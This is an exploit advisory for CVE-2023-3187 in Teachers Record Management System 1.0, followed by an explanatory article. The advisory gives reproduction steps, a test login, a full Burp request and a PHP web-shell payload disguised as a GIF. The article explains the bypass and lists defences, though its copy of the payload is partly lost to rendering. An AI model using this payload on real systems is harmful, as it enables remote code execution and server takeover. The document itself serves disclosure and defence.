Teachers Record Management System 1.0 - File Upload Type Validation
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187
===============================
STEPS_TO_REPRODUCE
===============================
1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the **Content-type from “ image/png “ to “ image/gif “
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
8. Below is the Burpsuite-POST Request for all the changes that I have made above
==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/trms/teacher/changeimage.php>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"
John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif
GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryndAPYa0GGOxSUHdF--
===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.mdExploiting File Upload Type Validation in Teachers Record Management System 1.0: A Deep Dive into CVE-2023-3187
Security vulnerabilities in web applications often stem from seemingly minor oversights in input validation and file handling. One such vulnerability, CVE-2023-3187, was discovered in the Teachers Record Management System 1.0 — a PHP-based application developed by PHP Gurukul. This flaw allows attackers to bypass file upload restrictions by manipulating file extensions and MIME types, leading to remote code execution (RCE). The exploit, documented by Affan Ahmed, highlights a critical failure in secure file upload practices.
Understanding the Vulnerability: File Upload Type Validation Bypass
File upload functionality is common in web applications, especially in systems managing user profiles, documents, or media. When implemented poorly, it can become a gateway for malicious payloads. In this case, the Teachers Record Management System allows teachers to upload profile pictures via a form at /trms/teacher/changeimage.php. While the system checks for file extensions (e.g., .png or .jpg), it fails to properly validate the actual content type — relying solely on the file extension and the Content-Type header.
Attackers exploit this by crafting a file with a deceptive extension — profile picture.php.gif — while embedding PHP code within the file’s content. The key to bypassing validation lies in the GIF magic bytes: GIF89a, which trick the server into treating the file as a valid GIF image, despite its embedded PHP code.
Step-by-Step Exploitation Process
The following steps demonstrate how an attacker can leverage this vulnerability to execute arbitrary commands on the server:
- Authentication: The attacker logs in using a known credential pair:
Username: jogoe12@yourdomain.comandPassword: Test@123. - Targeting the Upload Endpoint: Once logged in, the attacker navigates to the profile section and selects the “Edit Image” option.
- Intercepting the Request: Using Burp Suite, the attacker captures the POST request sent to
changeimage.php. - Manipulating File Metadata: The attacker modifies:
filenamefromprofile picture.pngtoprofile picture.php.gifContent-Typefromimage/pngtoimage/gif
- Injecting Malicious Payload: The attacker inserts the following payload into the file content:
GIF89aThis payload starts with the GIF header
GIF89ato bypass MIME type checks, followed by a PHP script that executes system commands passed via thedxparameter.
Proof of Concept: The Burp Suite Request
The modified POST request demonstrates the exploit’s mechanics:
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
...
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif
GIF89a
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"
...
When this request is sent, the server processes the file as a GIF image due to the Content-Type header and the valid GIF magic bytes. However, since the file is saved in a directory accessible via the web, the PHP code becomes executable when triggered.
Exploitation Outcome: Remote Code Execution
After uploading the malicious file, an attacker can execute commands by sending a GET request to the uploaded file with a dx parameter. For example:
http://localhost/trms/uploads/profile picture.php.gif?dx=whoamiThe server interprets the dx parameter as a command and executes whoami, returning the current user’s identity. This demonstrates full remote code execution — a critical security breach.
Why This Vulnerability Matters
File upload validation is a foundational security control. When systems rely only on file extensions or MIME types without inspecting actual content, they open the door to file-based attacks. This vulnerability is not unique — similar flaws have been reported in other systems like CMS platforms, file-sharing apps, and even content management systems.
Key takeaways:
- File extension validation alone is insufficient: A
.giffile can contain PHP code if the server doesn’t verify the content. - MIME type can be spoofed: Attackers can change
Content-Typeto bypass checks. - Malicious file content can be executed: If the uploaded file is stored in a web-accessible directory, it becomes a vector for RCE.
Security Best Practices to Prevent Such Exploits
To prevent vulnerabilities like CVE-2023-3187, developers should implement the following defenses:
| Best Practice | Explanation |
|---|---|
| Content Inspection | Always verify file content using tools like file command or MIME detection libraries (e.g., mime_content_type() in PHP). |
| Sanitize File Names | Strip or replace special characters and extensions. Use a whitelist of allowed extensions (e.g., .png, .jpg, .jpeg). |
| Store Files Outside Web Root | Upload files to a directory not accessible via HTTP to prevent direct execution. |
| Use Randomized File Names | Generate unique, non-predictable filenames to reduce the risk of path traversal attacks. |
| Validate File Headers | Check for correct magic bytes (e.g., GIF89a for GIF, PNG for PNG) to ensure the file matches its claimed type. |
Conclusion: Lessons from CVE-2023-3187
The Teachers Record Management System 1.0 vulnerability serves as a stark reminder that security is not just about checking file extensions — it’s about understanding the full context of file handling. Attackers exploit the gap between what a file claims to be and what it actually contains.
As cybersecurity professionals, we must advocate for layered defense strategies. Never trust file metadata alone. Always validate content, restrict file access, and enforce strict input sanitization. This single flaw — a misconfigured file upload — can lead to full server compromise, making it a prime example of why security should never be an afterthought.